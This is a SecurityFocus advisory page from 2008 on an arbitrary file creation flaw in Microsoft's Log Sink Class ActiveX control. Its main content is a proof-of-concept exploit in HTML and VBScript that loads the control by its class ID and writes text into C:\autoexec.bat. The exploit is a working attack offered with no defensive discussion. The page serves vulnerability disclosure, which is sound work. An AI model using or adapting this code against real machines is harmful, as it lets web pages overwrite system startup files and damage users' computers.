Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability

The following exmploit code is available:
<object id=ctl
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
<script language="vbscript">
ctl.initsink "C:\autoexec.bat"
ctl.addstring "echo Drive formatted? ", ""
ctl.deinitsink
</script>







 

Privacy Statement
Copyright 2008, SecurityFocus